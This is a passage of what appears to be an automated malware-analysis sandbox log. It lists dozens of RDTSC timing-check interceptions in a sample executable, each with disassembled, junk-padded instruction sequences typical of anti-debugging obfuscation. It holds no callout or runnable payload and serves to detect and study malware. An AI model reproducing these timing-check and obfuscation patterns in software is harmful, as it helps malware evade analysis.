0x0000004d popfd 0x0000004e mov dl, ah 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D105CA second address: 4D105EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, 6CE9h 0x00000011 mov di, si 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D105EB second address: 4D105F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D105F1 second address: 4D105F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D105F5 second address: 4D10651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB19901BD12h 0x00000012 or esi, 32F270E8h 0x00000018 jmp 00007FB19901BD0Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FB19901BD18h 0x00000024 and cx, 8348h 0x00000029 jmp 00007FB19901BD0Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10651 second address: 4D106B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB19901BDDFh 0x00000009 sbb si, 858Eh 0x0000000e jmp 00007FB19901BDE9h 0x00000013 popfd 0x00000014 mov dh, cl 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007FB19901BDE3h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 movsx ebx, si 0x00000027 jmp 00007FB19901BDDCh 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D104CE second address: 4D104EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D104EA second address: 4D1052B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB19901BDDBh 0x00000013 sbb esi, 15E1BDDEh 0x00000019 jmp 00007FB19901BDE9h 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D1052B second address: 4D10530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10244 second address: 4D1025F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D1025F second address: 4D10265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10265 second address: 4D10269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10269 second address: 4D10295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov cx, 45A9h 0x0000000e mov edi, eax 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007FB19901BD10h 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10295 second address: 4D10299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10299 second address: 4D1029F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20285 second address: 4D20295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BDDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20295 second address: 4D20299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D20299 second address: 4D202BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB19901BDE6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D202BC second address: 4D202CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D202CB second address: 4D202D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D202D1 second address: 4D2031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FB19901BD17h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov cl, B0h 0x00000015 jmp 00007FB19901BD11h 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FB19901BD0Dh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2031A second address: 4D2032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BDDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D2032A second address: 4D2032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D50DCE second address: 4D50DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D50DD4 second address: 4D50DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D50DD8 second address: 4D50E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FB19901BDE3h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB19901BDE5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D50E0D second address: 4D50E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BD0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D30531 second address: 4D305AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FB19901BDDEh 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FB19901BDDDh 0x0000001c xor cl, 00000026h 0x0000001f jmp 00007FB19901BDE1h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007FB19901BDE0h 0x0000002b or ecx, 7EF774C8h 0x00000031 jmp 00007FB19901BDDBh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D103B4 second address: 4D1044A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BD18h 0x00000008 pushfd 0x00000009 jmp 00007FB19901BD12h 0x0000000e or cx, 9FA8h 0x00000013 jmp 00007FB19901BD0Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FB19901BD14h 0x00000024 or ax, 1208h 0x00000029 jmp 00007FB19901BD0Bh 0x0000002e popfd 0x0000002f mov esi, 7071207Fh 0x00000034 popad 0x00000035 push eax 0x00000036 jmp 00007FB19901BD15h 0x0000003b xchg eax, ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FB19901BD0Dh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D30325 second address: 4D30384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB19901BDDEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FB19901BDDCh 0x00000019 sub ax, 5458h 0x0000001e jmp 00007FB19901BDDBh 0x00000023 popfd 0x00000024 jmp 00007FB19901BDE8h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D30384 second address: 4D3039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, 94E7h 0x00000010 mov ecx, 707F9883h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D3039A second address: 4D303B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BDE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D303B2 second address: 4D303B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D303B6 second address: 4D303DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov bl, 88h 0x0000000d mov bx, cx 0x00000010 popad 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FB19901BDDDh 0x0000001a mov esi, 6C9100A7h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D506FE second address: 4D50702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D50702 second address: 4D50708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D50708 second address: 4D5071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BD13h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D5071F second address: 4D5076C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov esi, ebx 0x0000000c mov ax, di 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 jmp 00007FB19901BDE9h 0x00000017 xchg eax, ecx 0x00000018 jmp 00007FB19901BDDEh 0x0000001d push eax 0x0000001e jmp 00007FB19901BDDBh 0x00000023 xchg eax, ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D5076C second address: 4D50770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D50770 second address: 4D50774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D50774 second address: 4D5077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D5077A second address: 4D507A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [774365FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB19901BDE7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D507A6 second address: 4D507BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1DE14FFAh 0x00000008 mov ax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test eax, eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D507BC second address: 4D507C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D507C2 second address: 4D507E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FB20B67EE95h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dh, 98h 0x00000014 mov di, si 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D507E6 second address: 4D50842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007FB19901BDDEh 0x00000010 xor eax, dword ptr [ebp+08h] 0x00000013 jmp 00007FB19901BDE1h 0x00000018 and ecx, 1Fh 0x0000001b pushad 0x0000001c mov esi, 3C0316C3h 0x00000021 mov si, 5C1Fh 0x00000025 popad 0x00000026 ror eax, cl 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FB19901BDE1h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D50842 second address: 4D50848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D50848 second address: 4D5084C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D0009D second address: 4D000E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e jmp 00007FB19901BD10h 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FB19901BD0Bh 0x0000001a xchg eax, ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FB19901BD10h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D000E3 second address: 4D000E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D000E7 second address: 4D000ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D000ED second address: 4D000F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D000F3 second address: 4D000F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D000F7 second address: 4D0015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a mov si, 0921h 0x0000000e mov esi, 3893165Dh 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FB19901BDE3h 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c mov al, FBh 0x0000001e pushfd 0x0000001f jmp 00007FB19901BDE1h 0x00000024 adc al, 00000056h 0x00000027 jmp 00007FB19901BDE1h 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebx, dword ptr [ebp+10h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FB19901BDDDh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D0015D second address: 4D00163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D00163 second address: 4D00172 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D00172 second address: 4D00178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D00178 second address: 4D001B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007FB19901BDE0h 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D001B0 second address: 4D001CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D001CD second address: 4D001D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D001D3 second address: 4D001D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D001D7 second address: 4D00231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FB19901BDE4h 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 mov edi, eax 0x00000014 pushfd 0x00000015 jmp 00007FB19901BDDAh 0x0000001a or ecx, 29C32C28h 0x00000020 jmp 00007FB19901BDDBh 0x00000025 popfd 0x00000026 popad 0x00000027 test esi, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FB19901BDE5h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D00231 second address: 4D00237 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D00237 second address: 4D00272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FB20B6CA1ACh 0x0000000e jmp 00007FB19901BDDFh 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB19901BDE5h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF084F second address: 4CF0863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 test esi, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e mov eax, 4A54E03Bh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF0863 second address: 4CF0873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BDDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF0873 second address: 4CF0877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF0877 second address: 4CF08A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FB20B6D18E5h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB19901BDE9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF08A2 second address: 4CF08A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF08A6 second address: 4CF08AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF08AC second address: 4CF08D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB19901BD0Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF08D2 second address: 4CF0960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, 04A35D51h 0x0000000e popad 0x0000000f mov ecx, esi 0x00000011 jmp 00007FB19901BDDCh 0x00000016 je 00007FB20B6D187Dh 0x0000001c jmp 00007FB19901BDE0h 0x00000021 test byte ptr [77436968h], 00000002h 0x00000028 jmp 00007FB19901BDE0h 0x0000002d jne 00007FB20B6D1863h 0x00000033 jmp 00007FB19901BDE0h 0x00000038 mov edx, dword ptr [ebp+0Ch] 0x0000003b pushad 0x0000003c call 00007FB19901BDDEh 0x00000041 mov ecx, 34C61281h 0x00000046 pop ecx 0x00000047 mov ah, dl 0x00000049 popad 0x0000004a xchg eax, ebx 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f pop ebx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF0960 second address: 4CF098F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 7517282Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, 1A29h 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FB19901BD0Ch 0x00000018 or cl, FFFFFFF8h 0x0000001b jmp 00007FB19901BD0Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF098F second address: 4CF09E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, BE1Ah 0x00000007 call 00007FB19901BDDBh 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebx 0x00000011 jmp 00007FB19901BDDFh 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FB19901BDE6h 0x0000001c push eax 0x0000001d pushad 0x0000001e mov ax, dx 0x00000021 call 00007FB19901BDDDh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF09E0 second address: 4CF0A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB19901BD18h 0x0000000e rdtsc
